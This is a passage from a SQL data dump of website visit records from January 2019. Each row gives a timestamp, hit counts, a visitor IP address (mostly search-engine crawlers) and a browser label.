,1,0,0,'157.55.39.97','other'),(368576,1547196491,1,1,0,0,'66.249.66.195','chrome'),(368577,1547196492,1,1,0,0,'66.249.66.156','chrome'),(368578,1547196970,1,1,0,0,'54.36.148.162','other'),(368579,1547197179,1,1,0,0,'54.36.148.24','other'),(368580,1547197282,8,8,0,0,'216.244.66.241','other'),(368581,1547197380,2,2,0,0,'31.43.31.110','chrome'),(368582,1547197401,1,1,0,0,'46.229.168.153','other'),(368583,1547197403,1,1,0,0,'46.229.168.138','other'),(368584,1547197600,1,1,0,0,'40.77.167.204','other'),(368585,1547197893,1,1,0,0,'54.36.149.40','other'),(368586,1547198088,1,1,0,0,'180.76.15.144','other'),(368587,1547198089,1,1,0,0,'180.76.15.26','other'),(368588,1547198104,1,1,0,0,'54.36.149.95','other'),(368589,1547198768,1,1,0,0,'54.36.148.45','other'),(368590,1547198851,1,1,0,0,'66.249.66.60','chrome'),(368591,1547198897,2,2,0,0,'216.244.66.241','other'),(368592,1547198994,1,1,0,0,'54.36.149.80','other'),(368593,1547199046,1,1,0,0,'46.229.168.133','other'),(368594,1547199153,1,1,0,0,'54.36.148.94','other'),(368595,1547199180,1,1,0,0,'94.178.146.92','chrome'),(368596,1547199192,1,1,0,0,'40.77.167.204','other'),(368597,1547199369,1,1,0,0,'46.229.168.149','other'),(368598,1547199508,1,1,0,0,'46.229.168.148','other'),(368599,1547199564,1,1,0,0,'54.36.148.54','other'),(368600,1547199630,1,1,0,0,'54.36.148.152','other'),(368601,1547199839,1,1,0,0,'54.165.59.7','other'),(368602,1547200040,1,1,0,0,'54.36.148.232','other'),(368603,1547200053,8,8,0,0,'216.244.66.241','other'),(368604,1547200064,1,1,0,0,'40.77.167.74','other'),(368605,1547200235,3,3,0,0,'91.196.178.67','chrome'),(368606,1547200267,1,1,0,0,'66.249.66.154','chrome'),(368607,1547200554,1,1,0,0,'8.29.198.26','other'),(368608,1547200692,1,1,0,0,'54.36.149.41','other'),(368609,1547200885,1,1,0,0,'46.229.168.135','other'),(368610,1547201023,1,1,0,0,'54.36.148.48','other'),(368611,1547201033,1,1,0,0,'46.229.168.148','other'),(368612,1547201137,1,1,0,0,'54.36.149.66','other'),(368613,1547201227,1,1,0,0,'141.8.142.103','other'),(368614,1547201237,1,1,0,0,'5.45.207.19','other'),(368615,1547201380,4,4,0,0,'178.154.244.11','other'),(368616,1547201571,3,3,0,0,'91.196.178.67','chrome'),(368617,1547201591,120,120,0,0,'46.4.107.106','other'),(368618,1547201710,1,1,0,0,'54.36.149.72','other'),(368619,1547201772,1,1,0,0,'8.29.198.27','other'),(368620,1547201883,1,1,0,0,'46.229.168.145','other'),(368621,1547201998,2,2,0,0,'95.132.40.251','firefox'),(368622,1547202031,1,1,0,0,'54.36.149.4','other'),(368623,1547202146,1,1,0,0,'46.229.168.144','other'),(368624,1547202492,34,34,0,0,'46.4.107.106','other'),(368625,1547202650,2,2,0,0,'54.36.148.73','other'),(368626,1547202830,5,5,0,0,'216.244.66.241','other'),(368627,1547202858,2,2,0,0,'91.196.178.67','chrome'),(368628,1547202939,1,1,0,0,'212.1.108.150','chrome'),(368629,1547202949,1,1,0,0,'54.36.148.186','other'),(368630,1547203184,1,1,0,0,'54.36.149.87','other'),(368631,1547203206,1,1,0,0,'54.36.149.41','other'),(368632,1547203396,13,13,0,0,'46.4.107.106','other'),(368633,1547203742,1,1,0,0,'66.249.66.152','chrome'),(368634,1547203761,1,1,0,0,'216.244.66.241','other'),(368635,1547204162,1,1,0,0,'54.36.148.203','other'),(368636,1547204300,12,12,0,0,'46.4.107.106','other'),(368637,1547204333,1,1,0,0,'54.36.148.73','other'),(368638,1547204449,1,1,0,0,'54.36.149.34','other'),(368639,1547204457,1,1,0,0,'54.36.148.36','other'),(368640,1547204466,1,1,0,0,'54.36.149.13','other'),(368641,1547204477,1,1,0,0,'91.196.178.169','chrome'),(368642,1547204492,1,1,0,0,'54.36.148.211','other'),(368643,1547204861,1,1,0,0,'54.36.148.115','other'),(368644,1547205079,1,1,0,0,'54.36.148.83','other'),(368645,1547205208,12,12,0,0,'46.4.107.106','other'),(368646,1547205307,1,1,0,0,'46.229.168.143','other'),(368647,1547205607,12,12,0,0,'216.244.66.241','other'),(368648,1547205788,1,1,0,0,'54.36.148.156','other'),(368649,1547206110,18,18,0,0,'46.4.107.106','other'),(368650,1547206287,1,1,0,0,'54.36.148.107','other'),(368651,1547206402,1,1,0,0,'54.36.148.128','other'),(368652,1547206449,1,1,0,0,'54.36.148.165','other'),(368653,1547206618,2,2,0,0,'216.244.66.241','other'),(368654,1547206706,1,1,0,0,'66.249.66.157','chrome'),(368655,1547206707,1,1,0,0,'66.249.66.152','chrome'),(368656,1547207021,10,10,0,0,'46.4.107.106','other'),(368657,1547207050,1,1,0,0,'46.229.168.129','other'),(368658,1547207580,1,1,0,0,'54.36.148.63','other'),(368659,1547207669,5,5,0,0,'216.244.66.241','other'),(368660,1547207716,1,1,0,0,'54.36.149.83','other'),(368661,1547207931,8,8,0,0,'46.4.107.106','other'),(368662,1547207932,1,1,0,0,'54.36.148.167','other'),(368663,1547208015,1,1,0,0,'54.36.149.62','other'),(368664,1547208265,1,1,0,0,'141.8.142.103','other'),(368665,1547208422,1,1,0,0,'95.108.213.4','other'),(368666,1547208516,1,1,0,0,'54.36.148.249','other'),(368667,1547208709,2,2,0,0,'216.244.66.241','other'),(368668,1547208740,1,1,0,0,'54.36.149.54','other'),(368669,1547208841,9,9,0,0,'46.4.107.106','other'),(368670,1547208927,1,1,0,0,'54.36.148.199','other'),(368671,1547209009,1,1,0,0,'54.36.148.233','other'),(368672,1547209029,1,1,0,0,'5.45.207.79','other'),(368673,1547209147,1,1,0,0,'54.36.148.196','other'),(368674,1547209334,1,1,0,0,'54.36.148.206','other'),(368675,1547209336,1,1,0,0,'54.36.148.205','other'),(368676,1547209716,1,1,0,0,'54.36.148.177','other'),(368677,1547209723,2,2,0,0,'216.244.66.241','other'),(368678,1547209863,1,1,0,0,'54.36.148.217','other'),(368679,1547210040,1,1,0,0,'54.36.149.97','other'),(368680,1547210263,1,1,0,0,'46.229.168.141','other'),(368681,1547210356,1,1,0,0,'66.249.66.44','chrome'),(368682,1547210445,2,2,0,0,'91.196.178.134','firefox'),(368683,1547210573,1,1,0,0,'54.36.148.248','other'),(368684,1547210840,1,1,0,0,'54.36.149.55','other'),(368685,1547210909,1,1,0,0,'54.36.149.15','other'),(368686,1547211139,1,1,0,0,'54.36.148.67','other'),(368687,1547211180,10,10,0,0,'216.244.66.241','other'),(368688,1547211396,1,1,0,0,'46.229.168.129','other'),(368689,1547211399,1,1,0,0,'8.29.198.26','other'),(368690,1547211488,1,1,0,0,'54.36.148.111','other'),(368691,1547211526,1,1,0,0,'54.36.148.33','other'),(368692,1547211774,1,1,0,0,'54.36.148.231','other'),(368693,1547211879,1,1,0,0,'54.36.149.79','other'),(368694,1547212153,2,2,0,0,'216.244.66.241','other'),(368695,1547212359,1,1,0,0,'46.229.168.150','other'),(368696,1547212361,1,1,0,0,'46.229.168.135','other'),(368697,1547212457,1,1,0,0,'54.36.148.83','other'),(368698,1547212605,1,1,0,0,'8.29.198.26','other'),(368699,1547213091,2,2,0,0,'216.244.66.241','other'),(368700,1547213092,1,1,0,0,'178.154.244.11','other'),(368701,1547213130,1,1,0,0,'54.36.148.249','other'),(368702,1547213204,1,1,0,0,'46.211.68.58','chrome'),(368703,1547213230,1,1,0,0,'54.36.148.175','other'),(368704,1547213260,1,1,0,0,'54.36.148.186','other'),(368705,1547213815,1,1,0,0,'66.249.66.156','chrome'),(368706,1547214139,1,1,0,0,'54.36.148.30','other'),(368707,1547214436,1,1,0,0,'54.36.149.82','other'),(368708,1547214450,1,1,0,0,'207.46.13.99','other'),(368709,1547214453,1,1,0,0,'54.36.148.33','other'),(368710,1547214485,1,1,0,0,'54.36.148.219','other'),(368711,1547214757,5,5,0,0,'216.244.66.241','other'),(368712,1547214862,1,1,0,0,'54.36.148.225','other'),(368713,1547215010,2,2,0,0,'91.209.11.236','other'),(368714,1547215319,3,3,0,0,'5.45.207.79','other'),(368715,1547215401,1,1,0,0,'54.36.148.195','other'),(368716,1547215469,1,1,0,0,'54.36.148.245','other'),(368717,1547215611,1,1,0,0,'95.108.213.4','other'),(368718,1547215736,1,1,0,0,'13.66.139.0','other'),(368719,1547215738,1,1,0,0,'54.36.149.29','other'),(368720,1547215744,1,1,0,0,'5.45.207.19','other'),(368721,1547216067,1,1,0,0,'54.36.148.242','other'),(368722,1547216129,1,1,0,0,'46.229.168.136','other'),(368723,1547216209,1,1,0,0,'54.36.148.201','other'),(368724,1547216210,1,1,0,0,'54.36.149.44','other'),(368725,1547216237,1,1,0,0,'54.36.148.178','other'),(368726,1547216326,1,1,0,0,'54.36.148.252','other'),(368727,1547216761,9,9,0,0,'216.244.66.241','other'),(368728,1547216762,1,1,0,0,'54.36.148.246','other'),(368729,1547216825,1,1,0,0,'54.36.148.182','other'),(368730,1547217074,1,1,0,0,'54.36.148.204','other'),(368731,1547217085,1,1,0,0,'54.36.148.171','other'),(368732,1547217306,1,1,0,0,'5.45.207.79','other'),(368733,1547217571,1,1,0,0,'54.36.149.34','other'),(368734,1547217685,4,4,0,0,'216.244.66.241','other'),(368735,1547217828,1,1,0,0,'46.229.168.130','other'),(368736,1547217995,1,1,0,0,'157.55.39.188','other'),(368737,1547218005,1,1,0,0,'54.36.149.30','other'),(368738,1547218234,1,1,0,0,'54.36.148.186','other'),(368739,1547218411,1,1,0,0,'66.249.66.61','chrome'),(368740,1547218412,1,1,0,0,'66.249.66.44','chrome'),(368741,1547218830,1,1,0,0,'54.36.148.50','other'),(368742,1547218865,1,1,0,0,'54.36.149.100','other'),(368743,1547219253,1,1,0,0,'157.55.39.188','other'),(368744,1547219411,1,1,0,0,'207.46.13.99','other'),(368745,1547219485,2,2,0,0,'193.93.186.82','firefox'),(368746,1547219538,13,13,0,0,'216.244.66.241','other'),(368747,1547219720,1,1,0,0,'46.229.168.153','other'),(368748,1547220198,1,1,0,0,'66.249.66.152','chrome'),(368749,1547220291,1,1,0,0,'95.163.255.93','other'),(368750,1547220293,1,1,0,0,'95.163.255.99','other'),(368751,1547220391,96,96,0,0,'5.189.178.48','other'),(368752,1547220476,4,4,0,0,'216.244.66.241','other'),(368753,1547220564,1,1,0,0,'54.36.148.242','other'),(368754,1547220723,1,1,0,0,'141.8.142.103','other'),(368755,1547221111,1,1,0,0,'54.36.148.54','other'),(368756,1547221269,1,1,0,0,'54.36.148.219','other'),(368757,1547221271,1,1,0,0,'23.101.169.3','msie'),(368758,1547221396,1,1,0,0,'54.36.149.71','other'),(368759,1547221472,1,1,0,0,'54.36.148.19','other'),(368760,1547221728,2,2,0,0,'5.45.207.19','other'),(368761,1547221935,1,1,0,0,'40.77.167.36','other'),(368762,1547222013,1,1,0,0,'54.36.148.161','other'),(368763,1547222256,1,1,0,0,'8.29.198.25','other'),(368764,1547222284,2,2,0,0,'185.22.173.136','other'),(368765,1547222332,4,4,0,0,'216.244.66.241','other'),(368766,1547222336,1,1,0,0,'54.36.149.29','other'),(368767,1547222340,1,1,0,0,'54.36.148.186','other'),(368768,1547222354,1,1,0,0,'178.154.244.11','other'),(368769,1547222618,1,1,0,0,'54.36.149.92','other'),(368770,1547222822,1,1,0,0,'5.45.207.79','other'),(368771,1547222963,1,1,0,0,'54.36.148.139','other'),(368772,1547223155,1,1,0,0,'54.36.148.48','other'),(368773,1547223290,1,1,0,0,'46.229.168.144','other'),(368774,1547223386,1,1,0,0,'216.244.66.241','other'),(368775,1547223437,1,1,0,0,'8.29.198.27','other'),(368776,1547223989,1,1,0,0,'54.36.148.76','other'),(368777,1547224003,1,1,0,0,'5.45.207.79','other'),(368778,1547224361,1,1,0,0,'54.36.148.184','other'),(368779,1547224370,1,1,0,0,'5.45.207.19','other'),(368780,1547224453,1,1,0,0,'54.36.149.85','other'),(368781,1547224742,1,1,0,0,'54.36.148.103','other'),(368782,1547224745,1,1,0,0,'54.36.149.49','other'),(368783,1547225105,1,1,0,0,'5.45.207.79','other'),(368784,1547225112,9,9,0,0,'216.244.66.241','other'),(368785,1547225143,1,1,0,0,'5.9.123.164','other'),(368786,1547225182,2,2,0,0,'66.249.66.156','chrome'),(368787,1547225183,6,6,0,0,'66.249.66.152','chrome'),(368788,1547225186,6,6,0,0,'66.249.66.154','chrome'),(368789,1547225421,1,1,0,0,'62.205.134.182','msie'),(368790,1547225432,1,1,0,0,'95.163.255.115','other'),(368791,1547225484,1,1,0,0,'54.36.148.20','other'),(368792,1547225697,1,1,0,0,'95.163.255.119','other'),(368793,1547225716,1,1,0,0,'54.36.148.148','other'),(368794,1547225958,1,1,0,0,'64.62.210.39','chrome'),(368795,1547226043,2,2,0,0,'176.113.170.104','firefox'),(368796,1547226133,7,7,0,0,'216.244.66.241','other'),(368797,1547226180,1,1,0,0,'54.36.148.103','other'),(368798,1547226252,1,1,0,0,'23.101.169.3','msie'),(368799,1547226566,1,1,0,0,'54.36.149.52','other'),(368800,1547226669,1,1,0,0,'54.36.148.208','other'),(368801,1547226751,1,1,0,0,'54.36.148.184','other'),(368802,1547226800,1,1,0,0,'46.229.168.153','other'),(368803,1547227079,1,1,0,0,'13.66.139.0','other'),(368804,1547227098,1,1,0,0,'54.36.148.82','other'),(368805,1547227632,1,1,0,0,'54.36.148.241','other'),(368806,1547227870,1,1,0,0,'23.101.169.3','msie'),(368807,1547227878,10,10,0,0,'216.244.66.241','other'),(368808,1547228156,1,1,0,0,'54.36.148.197','other'),(368809,1547228202,1,1,0,0,'54.36.148.62','other'),(368810,1547228349,1,1,0,0,'54.36.148.183','other'),(368811,1547228352,1,1,0,0,'5.45.207.79','other'),(368812,1547228581,1,1,0,0,'54.36.149.7','other'),(368813,1547228600,1,1,0,0,'54.36.149.83','other'),(368814,1547228615,1,1,0,0,'54.36.148.243','other'),(368815,1547228690,1,1,0,0,'54.36.148.201','other'),(368816,1547229188,1,1,0,0,'178.154.244.11','other'),(368817,1547229237,1,1,0,0,'54.36.148.239','other'),(368818,1547229455,2,2,0,0,'216.244.66.241','other'),(368819,1547229803,1,1,0,0,'54.36.148.238','other'),(368820,1547229962,1,1,0,0,'54.36.148.198','other'),(368821,1547230276,1,1,0,0,'180.76.15.25','other'),(368822,1547230277,1,1,0,0,'180.76.15.159','other'),(368823,1547230658,2,2,0,0,'216.244.66.241','other'),(368824,1547230841,1,1,0,0,'40.77.167.36','other'),(368825,1547231050,2,2,0,0,'23.101.169.3','msie'),(368826,1547231067,1,1,0,0,'54.36.148.96','other'),(368827,1547231430,2,2,0,0,'46.211.128.43','chrome'),(368828,1547231636,1,1,0,0,'141.8.142.103','other'),(368829,1547231654,1,1,0,0,'176.118.55.17','chrome'),(368830,1547232033,2,2,0,0,'216.244.66.241','other'),(368831,1547232152,1,1,0,0,'54.36.148.34','other'),(368832,1547232560,1,1,0,0,'54.36.149.7','other'),(368833,1547232773,1,1,0,0,'54.36.148.92','other'),(368834,1547233100,1,1,0,0,'8.29.198.26','other'),(368835,1547233271,2,2,0,0,'91.196.178.167','chrome'),(368836,1547233347,1,1,0,0,'54.36.148.81','other'),(368837,1547233402,4,4,0,0,'216.244.66.241','other'),(368838,1547233919,1,1,0,0,'54.36.149.66','other'),(368839,1547233956,1,1,0,0,'54.36.149.97','other'),(368840,1547234088,1,1,0,0,'5.45.207.19','other'),(368841,1547234264,1,1,0,0,'54.36.149.48','other'),(368842,1547234269,1,1,0,0,'8.29.198.27','other'),(368843,1547234410,1,1,0,0,'54.36.149.19','other'),(368844,1547234488,1,1,0,0,'46.229.168.144','other'),(368845,1547234612,1,1,0,0,'54.36.148.22','other'),(368846,1547234616,1,1,0,0,'54.36.149.67','other'),(368847,1547234928,1,1,0,0,'54.36.148.50','other'),(368848,1547234992,1,1,0,0,'66.249.66.57','chrome'),(368849,1547234993,1,1,0,0,'66.249.66.44','chrome'),(368850,1547235295,1,1,0,0,'54.36.149.96','other'),(368851,1547235522,6,6,0,0,'91.209.11.236','other'),(368852,1547235613,1,1,0,0,'54.36.149.60','other'),(368853,1547235668,1,1,0,0,'54.36.148.39','other'),(368854,1547235811,1,1,0,0,'54.36.149.16','other'),(368855,1547235818,1,1,0,0,'54.36.148.12','other'),(368856,1547235842,1,1,0,0,'95.108.213.4','other'),(368857,1547235850,3,3,0,0,'95.163.255.113','other'),(368858,1547235898,3,3,0,0,'178.154.244.11','other'),(368859,1547236026,2,1,1,0,'66.249.66.156',''),(368860,1547236082,2,2,0,0,'207.46.13.99','other'),(368861,1547236106,3,3,0,0,'5.45.207.79','other'),(368862,1547236157,6,6,0,0,'216.244.66.241','other'),(368863,1547236444,1,1,0,0,'54.36.148.210','other'),(368864,1547236511,2,2,0,0,'5.45.207.19','other'),(368865,1547236665,2,2,0,0,'95.163.255.118','other'),(368866,1547236668,1,1,0,0,'37.9.113.148','other'),(368867,1547236679,1,1,0,0,'95.163.255.108','other'),(368868,1547236753,1,1,0,0,'87.250.224.47','other'),(368869,1547236898,1,0,1,0,'66.249.66.157',''),(368870,1547236960,1,1,0,0,'54.36.149.77','other'),(368871,1547236975,2,2,0,0,'95.163.255.103','other'),(368872,1547237064,1,1,0,0,'66.249.66.154','chrome'),(368873,1547237122,1,1,0,0,'216.244.66.241','other'),(368874,1547237132,1,1,0,0,'54.36.148.61','other'),(368875,1547237182,1,1,0,0,'40.77.167.192','other'),(368876,1547237188,1,1,0,0,'207.46.13.99','other'),(368877,1547237209,1,1,0,0,'95.163.255.112','other'),(368878,1547237436,1,1,0,0,'95.163.255.115','other'),(368879,1547237443,2,2,0,0,'37.115.64.97','firefox'),(368880,1547237502,1,1,0,0,'54.36.149.10','other'),(368881,1547237589,1,1,0,0,'95.163.255.114','other'),(368882,1547237823,1,1,0,0,'95.163.255.108','other'),(368883,1547237884,1,1,0,0,'23.101.169.3','msie'),(368884,1547238291,1,1,0,0,'46.229.168.152','other'),(368885,1547238557,1,1,0,0,'54.36.148.51','other'),(368886,1547238709,1,1,0,0,'46.229.168.129','other'),(368887,1547238877,1,1,0,0,'54.36.149.56','other'),(368888,1547238928,4,4,0,0,'216.244.66.241','other'),(368889,1547238962,1,1,0,0,'54.36.149.93','other'),(368890,1547239102,1,1,0,0,'54.36.148.41','other'),(368891,1547239303,1,1,0,0,'46.229.168.134','other'),(368892,1547239307,1,1,0,0,'46.229.168.137','other'),(368893,1547239523,1,1,0,0,'54.36.148.35','other'),(368894,1547239542,1,1,0,0,'66.249.66.154','chrome'),(368895,1547239647,2,2,0,0,'54.36.148.178','other'),(368896,1547239829,5,5,0,0,'216.244.66.241','other'),(368897,1547240012,1,1,0,0,'23.101.169.3','msie'),(368898,1547240863,1,1,0,0,'54.36.148.41','other'),(368899,1547240897,1,1,0,0,'66.102.9.60','chrome'),(368900,1547240982,3,3,0,0,'216.244.66.241','other'),(368901,1547241066,1,1,0,0,'54.36.148.47','other'),(368902,1547241220,1,1,0,0,'54.36.148.229','other'),(368903,1547241245,1,1,0,0,'54.36.149.68','other'),(368904,1547241406,1,1,0,0,'54.36.149.63','other'),(368905,1547241415,1,1,0,0,'66.249.66.157','chrome'),(368907,1547241453,1,1,0,0,'66.249.66.61','chrome'),(368908,1547241454,1,1,0,0,'66.249.66.40','chrome'),(368909,1547241574,2,2,0,0,'66.249.66.42','chrome'),(368910,1547241629,1,1,0,0,'54.36.149.31','other'),(368911,1547241922,1,1,0,0,'46.229.168.153','other'),(368912,1547242344,1,1,0,0,'54.36.148.173','other'),(368913,1547242408,1,1,0,0,'66.249.66.61','chrome'),(368914,1547242416,2,2,0,0,'216.244.66.241','other'),(368915,1547242590,1,1,0,0,'54.36.149.31','other'),(368916,1547242896,4,4,0,0,'91.209.11.236','other'),(368917,1547242954,1,1,0,0,'40.77.167.206','other'),(368918,1547243141,1,1,0,0,'66.249.66.42','chrome'),(368919,1547243192,1,1,0,0,'66.249.66.157','chrome'),(368920,1547243193,1,1,0,0,'66.249.66.154','chrome'),(368921,1547243283,1,1,0,0,'54.36.148.13','other'),(368922,1547243680,1,1,0,0,'46.229.168.140','other'),(368923,1547243943,1,1,0,0,'8.29.198.27','other'),(368924,1547244252,2,2,0,0,'174.129.44.115','other'),(368925,1547244332,2,2,0,0,'66.249.66.155','chrome'),(368926,1547244413,8,8,0,0,'216.244.66.241','other'),(368927,1547244422,1,1,0,0,'66.249.66.152','chrome'),(368928,1547244498,1,1,0,0,'54.36.148.137','other'),(368929,1547244811,1,1,0,0,'54.36.149.61','other'),(368930,1547245105,1,1,0,0,'8.29.198.26','other'),(368931,1547245116,2,2,0,0,'66.249.66.156','chrome'),(368932,1547245340,4,4,0,0,'216.244.66.241','other'),(368933,1547245393,1,1,0,0,'54.36.148.227','other'),(368934,1547246005,1,1,0,0,'54.36.148.238','other'),(368935,1547246309,1,1,0,0,'54.36.149.96','other'),(368936,1547246410,1,1,0,0,'46.229.168.141','other'),(368937,1547246413,1,1,0,0,'54.36.148.123','other'),(368938,1547246708,1,1,0,0,'54.36.149.42','other'),(368939,1547246810,1,1,0,0,'54.36.148.247','other'),(368940,1547247252,4,4,0,0,'216.244.66.241','other'),(368941,1547247524,1,1,0,0,'207.46.13.22','other'),(368942,1547247764,1,1,0,0,'23.101.169.3','msie'),(368943,1547248144,1,1,0,0,'54.36.148.230','other'),(368944,1547248145,1,1,0,0,'157.55.39.202','other'),(368945,1547248167,2,2,0,0,'216.244.66.241','other'),(368946,1547248448,1,1,0,0,'88.99.2.203','other'),(368947,1547248677,1,1,0,0,'40.77.167.39','other'),(368948,1547248692,1,1,0,0,'207.46.13.22','other'),(368949,1547248937,1,1,0,0,'66.249.66.61','chrome'),(368950,1547248938,1,1,0,0,'66.249.66.40','chrome'),(368951,1547248975,1,1,0,0,'66.249.66.57','chrome'),(368952,1547248976,1,1,0,0,'66.249.66.42','chrome'),(368953,1547249091,4,4,0,0,'91.209.11.236','other'),(368954,1547249513,1,1,0,0,'54.36.148.14','other'),(368955,1547249816,1,1,0,0,'54.36.148.209','other'),(368956,1547249933,3,3,0,0,'216.244.66.241','other'),(368957,1547249934,1,1,0,0,'54.36.148.130','other'),(368958,1547249955,1,1,0,0,'87.250.224.47','other'),(368959,1547249959,1,1,0,0,'178.154.244.11','other'),(368960,1547250126,2,2,0,0,'141.8.142.103','other'),(368961,1547250189,1,1,0,0,'54.36.148.117','other'),(368962,1547250303,1,1,0,0,'54.36.149.66','other'),(368963,1547250458,1,1,0,0,'54.36.148.211','other'),(368964,1547250899,4,4,0,0,'216.244.66.241','other'),(368965,1547251543,1,1,0,0,'54.36.149.31','other'),(368966,1547251654,1,1,0,0,'46.229.168.147','other'),(368967,1547251845,1,1,0,0,'54.36.149.27','other'),(368968,1547252128,1,1,0,0,'54.36.148.12','other'),(368969,1547252167,1,1,0,0,'66.249.66.44','chrome'),(368970,1547252698,10,10,0,0,'216.244.66.241','other'),(368971,1547252903,1,1,0,0,'54.36.149.96','other'),(368972,1547253168,1,1,0,0,'54.36.149.19','other'),(368973,1547253428,1,1,0,0,'66.249.66.154','chrome'),(368974,1547253689,1,1,0,0,'66.249.66.152','chrome'),(368975,1547253694,1,1,0,0,'54.36.148.192','other'),(368976,1547253700,1,1,0,0,'54.36.148.194','other'),(368977,1547253764,1,1,0,0,'54.36.149.83','other'),(368978,1547253766,1,1,0,0,'66.249.66.42','chrome'),(368979,1547253898,3,3,0,0,'216.244.66.241','other'),(368980,1547254044,1,1,0,0,'46.229.168.151','other'),(368981,1547254539,1,1,0,0,'54.36.148.94','other'),(368982,1547254780,1,1,0,0,'8.29.198.26','other'),(368983,1547254827,1,1,0,0,'54.36.148.78','other'),(368984,1547254936,1,1,0,0,'54.36.148.250','other'),(368985,1547255105,1,1,0,0,'54.36.148.212','other'),(368986,1547255285,1,1,0,0,'54.36.149.93','other'),(368987,1547255403,1,1,0,0,'66.249.66.61','chrome'),(368989,1547255423,1,1,0,0,'54.36.148.54','other'),(368990,1547255442,6,6,0,0,'216.244.66.241','other'),(368991,1547255545,2,2,0,0,'91.209.11.236','other'),(368992,1547255591,1,1,0,0,'157.55.39.202','other'),(368993,1547255648,1,1,0,0,'88.99.2.203','other'),(368994,1547255770,1,1,0,0,'207.46.13.22','other'),(368995,1547255928,1,1,0,0,'8.29.198.25','other'),(368996,1547255934,2,2,0,0,'54.36.148.37','other'),(368997,1547255941,1,1,0,0,'178.154.244.11','other'),(368998,1547255963,1,1,0,0,'54.36.148.180','other'),(369000,1547256370,1,1,0,0,'54.36.148.161','other'),(369001,1547256424,1,1,0,0,'157.55.39.246','other'),(369002,1547256500,1,1,0,0,'40.77.167.206','other'),(369003,1547256527,1,1,0,0,'87.250.224.47','other'),(369004,1547257002,2,2,0,0,'66.249.66.152','chrome'),(369005,1547257047,1,1,0,0,'54.36.149.92','other'),(369006,1547257140,1,1,0,0,'54.36.148.158','other'),(369007,1547257219,1,1,0,0,'216.244.66.241','other'),(369008,1547257224,1,1,0,0,'66.249.66.155','chrome'),(369009,1547258128,1,1,0,0,'54.36.148.153','other'),(369010,1547258239,8,8,0,0,'216.244.66.241','other'),(369011,1547258463,1,1,0,0,'54.36.148.86','other'),(369012,1547258561,1,1,0,0,'54.36.148.225','other'),(369013,1547259183,1,1,0,0,'54.36.149.43','other'),(369014,1547259570,1,1,0,0,'40.77.167.189','other'),(369015,1547259632,1,1,0,0,'54.36.148.214','other'),(369016,1547259646,1,1,0,0,'54.36.148.206','other'),(369017,1547260302,2,2,0,0,'216.244.66.241','other'),(369018,1547260320,1,1,0,0,'54.36.149.76','other'),(369019,1547260352,1,1,0,0,'66.249.66.157','chrome'),(369020,1547260378,1,1,0,0,'66.249.66.156','chrome'),(369021,1547260379,1,1,0,0,'66.249.66.154','chrome'),(369022,1547260393,1,1,0,0,'54.36.149.6','other'),(369023,1547260396,2,2,0,0,'66.249.66.61','chrome'),(369024,1547260397,1,1,0,0,'66.249.66.44','chrome'),(369025,1547260633,3,3,0,0,'40.77.167.127','other'),(369026,1547260723,1,1,0,0,'46.229.168.147','other'),(369027,1547261251,1,1,0,0,'46.229.168.133','other'),(369028,1547261289,1,1,0,0,'66.249.66.42','chrome'),(369030,1547261634,3,3,0,0,'40.77.167.127','other'),(369031,1547261665,4,4,0,0,'91.209.11.236','other'),(369032,1547261797,2,2,0,0,'34.222.98.136','chrome'),(369033,1547262288,1,1,0,0,'141.8.142.103','other'),(369034,1547262340,3,3,0,0,'216.244.66.241','other'),(369035,1547262377,1,1,0,0,'46.229.168.130','other'),(369036,1547262379,1,1,0,0,'46.229.168.148','other'),(369037,1547262395,1,1,0,0,'54.36.148.118','other'),(369038,1547262474,1,1,0,0,'46.229.168.136','other'),(369039,1547262476,1,1,0,0,'46.229.168.147','other'),(369040,1547262550,1,1,0,0,'157.55.39.76','other'),(369041,1547262575,1,1,0,0,'95.108.213.4','other'),(369042,1547262784,2,2,0,0,'40.77.167.127','other'),(369043,1547262835,1,1,0,0,'40.77.167.206','other'),(369044,1547262873,1,1,0,0,'54.36.148.127','other'),(369045,1547262895,1,1,0,0,'66.249.66.157','chrome'),(369046,1547262896,1,1,0,0,'66.249.66.154','chrome'),(369047,1547263213,1,1,0,0,'54.36.149.89','other'),(369048,1547263256,1,1,0,0,'141.8.142.103','other'),(369049,1547263335,1,1,0,0,'54.36.149.30','other'),(369050,1547263416,2,2,0,0,'54.36.149.62','other'),(369051,1547263455,1,1,0,0,'66.249.66.59','chrome'),(369052,1547263456,1,1,0,0,'66.249.66.42','chrome'),(369053,1547263479,2,2,0,0,'54.165.59.7','other'),(369054,1547263548,1,1,0,0,'54.36.148.240','other'),(369055,1547263654,1,1,0,0,'54.36.148.237','other'),(369056,1547263748,1,1,0,0,'66.249.66.152','chrome'),(369057,1547263891,4,4,0,0,'216.244.66.241','other'),(369058,1547264548,1,1,0,0,'54.36.148.184','other'),(369059,1547264651,1,1,0,0,'66.249.66.157','chrome'),(369060,1547264652,1,1,0,0,'66.249.66.152','chrome'),(369061,1547264745,1,1,0,0,'46.229.168.150','other'),(369062,1547264848,1,1,0,0,'46.229.168.154','other'),(369063,1547264877,2,2,0,0,'216.244.66.241','other'),(369064,1547265097,2,2,0,0,'66.249.66.156','chrome'),(369065,1547265241,2,2,0,0,'54.165.59.7','other'),(369066,1547265469,1,1,0,0,'54.36.148.255','other'),(369067,1547265629,1,1,0,0,'8.29.198.26','other'),(369068,1547265940,1,1,0,0,'54.36.149.29','other'),(369069,1547266020,1,1,0,0,'54.36.149.80','other'),(369070,1547266239,1,1,0,0,'54.36.149.15','other'),(369071,1547266302,1,1,0,0,'54.36.149.107','other'),(369072,1547266414,1,1,0,0,'54.36.148.25','other'),(369073,1547266420,1,1,0,0,'54.36.148.32','other'),(369074,1547266598,4,4,0,0,'216.244.66.241','other'),(369075,1547266759,1,1,0,0,'8.29.198.27','other'),(369076,1547266779,1,1,0,0,'66.249.66.154','chrome'),(369077,1547266781,1,1,0,0,'46.229.168.141','other'),(369078,1547266789,1,1,0,0,'54.36.149.24','other'),(369079,1547266798,1,1,0,0,'157.55.39.76','other'),(369080,1547266833,1,1,0,0,'54.36.148.155','other'),(369081,1547267353,1,1,0,0,'54.36.149.25','other'),(369082,1547267659,1,1,0,0,'66.249.66.40','chrome'),(369083,1547267734,4,4,0,0,'216.244.66.241','other'),(369084,1547267755,1,1,0,0,'66.249.66.44','chrome'),(369085,1547267900,1,1,0,0,'66.249.66.154','chrome'),(369086,1547267930,1,1,0,0,'46.229.168.145','other'),(369087,1547268047,1,1,0,0,'54.36.148.111','other'),(369088,1547268111,1,1,0,0,'157.55.39.76','other'),(369089,1547268192,2,2,0,0,'91.196.178.130','firefox'),(369090,1547268284,1,1,0,0,'54.36.148.65','o